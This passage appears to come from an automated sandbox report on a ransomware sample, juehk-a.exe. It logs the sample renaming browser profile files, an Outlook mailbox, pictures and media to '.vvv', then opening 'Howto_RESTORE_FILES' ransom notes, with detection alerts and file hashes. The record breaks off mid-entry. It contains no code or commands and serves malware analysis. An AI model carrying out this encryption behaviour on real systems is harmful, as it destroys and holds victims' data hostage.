- new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\prefs.js.vvv
- ads:
- fid (ads:): 2533274790495574
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200621
- mode: rename
- sequenceNumber: 2600
- filesize: 1198
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\sessionstore.js
- new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\sessionstore.js.vvv
- ads:
- fid (ads:): 2814749767189463
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200633
- mode: rename
- sequenceNumber: 2601
- filesize: 574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\signons2.txt
- new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\signons2.txt.vvv
- ads:
- fid (ads:): 32369622321822778
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200645
- mode: rename
- sequenceNumber: 2602
- filesize: 574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\signons3.txt
- new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\g7sfg8u4.hh3fwg7c.default\signons3.txt.vvv
- ads:
- fid (ads:): 1407374883652672
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200693
- mode: rename
- sequenceNumber: 2603
- filesize: 574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\cookies.txt
- new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\cookies.txt.vvv
- ads:
- fid (ads:): 562949953520733
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200766
- mode: rename
- sequenceNumber: 2604
- filesize: 9422
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\prefs.js
- new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\prefs.js.vvv
- ads:
- fid (ads:): 2533274790495575
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200794
- mode: rename
- sequenceNumber: 2605
- filesize: 1294
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\sessionstore-backups\previous.js
- new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\sessionstore-backups\previous.js.vvv
- ads:
- fid (ads:): 5629499534216117
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200810
- mode: rename
- sequenceNumber: 2606
- filesize: 574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\signons2.txt
- new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\signons2.txt.vvv
- ads:
- fid (ads:): 562949953520728
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 200822
- mode: rename
- sequenceNumber: 2607
- filesize: 574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\signons3.txt
- new_name: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\wkhwllxj.pwbyzp25.default\signons3.txt.vvv
- ads:
- fid (ads:): 562949953520729
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 204641
- mode: rename
- sequenceNumber: 2608
- filesize: 271790
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\Documents\Outlook Files\Outlook.pst
- new_name: C:\Users\Administrator\Documents\Outlook Files\Outlook.pst.vvv
- ads:
- fid (ads:): 1125899906917540
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 205373
- mode: rename
- sequenceNumber: 2609
- filesize: 202254
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 01.wma
- new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 01.wma.vvv
- ads:
- fid (ads:): 281474976726621
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 205394
- mode: rename
- sequenceNumber: 2610
- filesize: 139614
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 02.wma
- new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 02.wma.vvv
- ads:
- fid (ads:): 281474976726623
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 205424
- mode: rename
- sequenceNumber: 2611
- filesize: 94878
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 03.wma
- new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 03.wma.vvv
- ads:
- fid (ads:): 281474976726625
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 205470
- mode: rename
- sequenceNumber: 2612
- filesize: 238046
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 04.wma
- new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 04.wma.vvv
- ads:
- fid (ads:): 281474976726627
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 205580
- mode: rename
- sequenceNumber: 2613
- filesize: 112782
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 05.wma
- new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 05.wma.vvv
- ads:
- fid (ads:): 281474976726629
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 205704
- mode: rename
- sequenceNumber: 2614
- filesize: 94878
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 06.wma
- new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 06.wma.vvv
- ads:
- fid (ads:): 281474976726631
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 205716
- mode: rename
- sequenceNumber: 2615
- filesize: 94878
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 07.wma
- new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 07.wma.vvv
- ads:
- fid (ads:): 281474976726633
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 205735
- mode: rename
- sequenceNumber: 2616
- filesize: 139614
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 08.wma
- new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 08.wma.vvv
- ads:
- fid (ads:): 281474976726635
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 205749
- mode: rename
- sequenceNumber: 2617
- filesize: 112782
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 09.wma
- new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 09.wma.vvv
- ads:
- fid (ads:): 281474976726637
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 205777
- mode: rename
- sequenceNumber: 2618
- filesize: 94878
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 10.wma
- new_name: C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 10.wma.vvv
- ads:
- fid (ads:): 281474976726639
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 206196
- mode: rename
- sequenceNumber: 2619
- filesize: 175342
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mscorsvw.exe_dc6a793f89565b9ffe0b9deffef5f8de721b5e_cab_081bb04b\WERAE19.tmp.appcompat.txt
- new_name: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mscorsvw.exe_dc6a793f89565b9ffe0b9deffef5f8de721b5e_cab_081bb04b\WERAE19.tmp.appcompat.txt.vvv
- ads:
- fid (ads:): 562949953439663
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 206235
- mode: rename
- sequenceNumber: 2620
- filesize: 846
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_80070422_d7638e9b4583aef4ba6602b7af2af4fc25fa3c_cab_078ccfdc\client_manifest.txt
- new_name: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\NonCritical_80070422_d7638e9b4583aef4ba6602b7af2af4fc25fa3c_cab_078ccfdc\client_manifest.txt.vvv
- ads:
- fid (ads:): 281474976922435
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 209237
- mode: rename
- sequenceNumber: 2621
- filesize: 33118
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Real\RealPlayer\RDInstall-log.txt
- new_name: C:\ProgramData\Real\RealPlayer\RDInstall-log.txt.vvv
- ads:
- fid (ads:): 844424930225985
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 209709
- mode: rename
- sequenceNumber: 2622
- filesize: 36590
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\Real\RealPlayer\RDRepair-log.txt
- new_name: C:\ProgramData\Real\RealPlayer\RDRepair-log.txt.vvv
- ads:
- fid (ads:): 562949953515328
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 212779
- mode: rename
- sequenceNumber: 2623
- filesize: 14558
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext\Chrome\Content\browserrecordloader.js
- new_name: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext\Chrome\Content\browserrecordloader.js.vvv
- ads:
- fid (ads:): 562949953515383
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 212899
- mode: rename
- sequenceNumber: 2624
- filesize: 2750
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext\Chrome\Skin\rp_logo.png
- new_name: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext\Chrome\Skin\rp_logo.png.vvv
- ads:
- fid (ads:): 562949953515497
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 213194
- mode: rename
- sequenceNumber: 2625
- filesize: 12446
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\ProgramData\RealNetworks\RealDownloader\Scripts\bookmark.js
- new_name: C:\ProgramData\RealNetworks\RealDownloader\Scripts\bookmark.js.vvv
- ads:
- fid (ads:): 562949953515382
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 213503
- mode: rename
- sequenceNumber: 2626
- filesize: 879822
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
- new_name: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.vvv
- ads:
- fid (ads:): 281474976726986
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 213600
- mode: rename
- sequenceNumber: 2627
- filesize: 846366
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
- new_name: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.vvv
- ads:
- fid (ads:): 281474976726988
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 213648
- mode: rename
- sequenceNumber: 2628
- filesize: 595710
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
- new_name: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.vvv
- ads:
- fid (ads:): 281474976726991
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 213699
- mode: rename
- sequenceNumber: 2629
- filesize: 776126
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
- new_name: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.vvv
- ads:
- fid (ads:): 281474976726993
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 213753
- mode: rename
- sequenceNumber: 2630
- filesize: 781246
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
- new_name: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.vvv
- ads:
- fid (ads:): 281474976726995
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 213791
- mode: rename
- sequenceNumber: 2631
- filesize: 561694
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
- new_name: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.vvv
- ads:
- fid (ads:): 281474976726997
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 213826
- mode: rename
- sequenceNumber: 2632
- filesize: 778254
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
- new_name: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.vvv
- ads:
- fid (ads:): 281474976726999
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 213875
- mode: rename
- sequenceNumber: 2633
- filesize: 621310
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
- new_name: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.vvv
- ads:
- fid (ads:): 281474976727001
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 214933
- mode: rename
- sequenceNumber: 2634
- filesize: 26246446
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
- new_name: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.vvv
- ads:
- fid (ads:): 281474976727011
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 215108
- sequenceNumber: 2635
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameW
- address: 0x71fba425
- params:
- param (id:1): 0x799bd8
- param (id:2): 0x2c8f8d8
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 2636
- timestamp: 215112
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 215199
- sequenceNumber: 2637
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameExW
- address: 0x71f638b7
- params:
- param (id:1): 0
- param (id:2): 0x563f10
- param (id:3): 0x2c8f790
- apicall:
- timestamp: 215318
- sequenceNumber: 2638
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameExW
- address: 0x71f638b7
- params:
- param (id:1): 0
- param (id:2): 0x563f38
- param (id:3): 0x2c8f778
- apicall:
- timestamp: 215318
- sequenceNumber: 2639
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameExW
- address: 0x71f638b7
- params:
- param (id:1): 0
- param (id:2): 0x563f10
- param (id:3): 0x2c8f778
- apicall:
- timestamp: 215339
- sequenceNumber: 2640
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: Shell32.dll
- apiname: ShellExecuteW
- address: 0x0041f497
- params:
- param (id:1): 0x0
- param (id:2): open
- param (id:3): C:\Users\Administrator\Desktop\Howto_RESTORE_FILES.txt
- param (id:4): NULL
- param (id:5): NULL
- param (id:6): 1
- process:
- timestamp: 215531
- mode: opened
- sequenceNumber: 2641
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2384
- tid: 0
- imagepath: N\AB
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 215543
- mode: started
- sequenceNumber: 2642
- value: C:\Windows\SysWOW64\notepad.exe
- pid: 2384
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Desktop\Howto_RESTORE_FILES.txt
- filesize: N/A
- md5sum: d378bffb70923139d6a4f546864aa61c
- sha1sum: N/A
- ads:
- fid (ads:): 281474976748820
- malicious-alert:
- classtype: Decoy-Activity
- weight: 0
- ruleid: 6600 : Decoy Application Started ; Decoy Application Started
- msg: Decoy Application Started
- display-msg: Decoy Application Started
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10095 : Suspicious Decoy Activity ; Suspicious Decoy Activity
- msg: Suspicious Decoy Activity
- display-msg: Suspicious Decoy Activity
- process:
- timestamp: 215551
- mode: opened
- sequenceNumber: 2643
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2384
- imagepath: C:\Windows\SysWOW64\notepad.exe
- md5sum: d378bffb70923139d6a4f546864aa61c
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 215557
- mode: opened
- sequenceNumber: 2644
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2384
- imagepath: C:\Windows\SysWOW64\notepad.exe
- md5sum: d378bffb70923139d6a4f546864aa61c
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 215563
- mode: opened
- sequenceNumber: 2645
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2384
- imagepath: C:\Windows\SysWOW64\notepad.exe
- md5sum: d378bffb70923139d6a4f546864aa61c
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- high_cpu:
- timestamp: 215958
- sequenceNumber: 2646
- total_cpu: 63.63613053613053
- processinfo:
- tainted: true
- pid: 2312
- process_cpu: 63.63613053613053
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 216364
- sequenceNumber: 2647
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: Shell32.dll
- apiname: ShellExecuteW
- address: 0x0041f497
- params:
- param (id:1): 0x0
- param (id:2): open
- param (id:3): C:\Users\Administrator\Desktop\Howto_RESTORE_FILES.html
- param (id:4): NULL
- param (id:5): NULL
- param (id:6): 1
- file:
- timestamp: 216570
- mode: failed
- sequenceNumber: 2648
- value: C:\Windows\System32\WOW64LOG.DLL
- processinfo:
- tainted: true
- pid: 2384
- imagepath: C:\Windows\SysWOW64\notepad.exe
- md5sum: d378bffb70923139d6a4f546864aa61c
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 2649
- timestamp: 216850
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2384
- imagepath: C:\Windows\SysWOW64\notepad.exe
- md5sum: d378bffb70923139d6a4f546864aa61c
- file:
- timestamp: 217030
- mode: failed
- sequenceNumber: 2650
- value: C:\Windows\SysWOW64\RPCSS.DLL
- processinfo:
- tainted: true
- pid: 2384
- imagepath: C:\Windows\SysWOW64\notepad.exe
- md5sum: d378bffb70923139d6a4f546864aa61c
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- timestamp: 217082
- mode: setval
- sequenceNumber: 2651
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\"{17FE9752-0B5A-4665-84CD-569794602F5C} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF" = 01 00 00 00 00 00 00 00 20 21 50 5b 20 2f d1 01
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 217489
- sequenceNumber: 2652
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: FindWindowExW
- address: 0x74ac8d12
- params:
- param (id:1): 0x0
- param (id:2): 0x0
- param (id:3): IEFrame
- param (id:4): NULL
- apicall:
- timestamp: 217493
- sequenceNumber: 2653
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: FindWindowExW
- address: 0x74ac8d12
- params:
- param (id:1): 0x0
- param (id:2): 0x10212
- param (id:3): IEFrame
- param (id:4): NULL
- new-dialog-popup:
- timestamp: 217747
- sequenceNumber: 2654
- processinfo:
- pid: 2384
- imagepath: C:\Windows\SysWOW64\notepad.exe
- hwnd: 0x002002B8
- title: Howto_RESTORE_FILES - Notepad
- window-class: Notepad
- size-width: 768
- size-height: 556
- position-x: 150
- position-y: 150
- visible: true
- topmost: false
- text-fields:
- text-field (id:1): Howto_RESTORE_FILES - Notepad
- apicall:
- timestamp: 217761
- sequenceNumber: 2655
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: FindWindowExW
- address: 0x74ac8bfa
- params:
- param (id:1): 0x0
- param (id:2): 0x0
- param (id:3): IEFrame
- param (id:4): NULL
- apicall:
- timestamp: 217761
- sequenceNumber: 2656
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: FindWindowExW
- address: 0x74ac8bfa
- params:
- param (id:1): 0x0
- param (id:2): 0x10212
- param (id:3): IEFrame
- param (id:4): NULL
- apicall:
- timestamp: 217761
- sequenceNumber: 2657
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: FindWindowExW
- address: 0x74ac8bfa
- params:
- param (id:1): 0x0
- param (id:2): 0x10186
- param (id:3): IEFrame
- param (id:4): NULL
- apicall:
- timestamp: 217762
- sequenceNumber: 2658
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: FindWindowExW
- address: 0x74ac8bfa
- params:
- param (id:1): 0x0
- param (id:2): 0x2009e
- param (id:3): IEFrame
- param (id:4): NULL
- apicall:
- timestamp: 217939
- repeat: 60000
- sequenceNumber: 2659
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
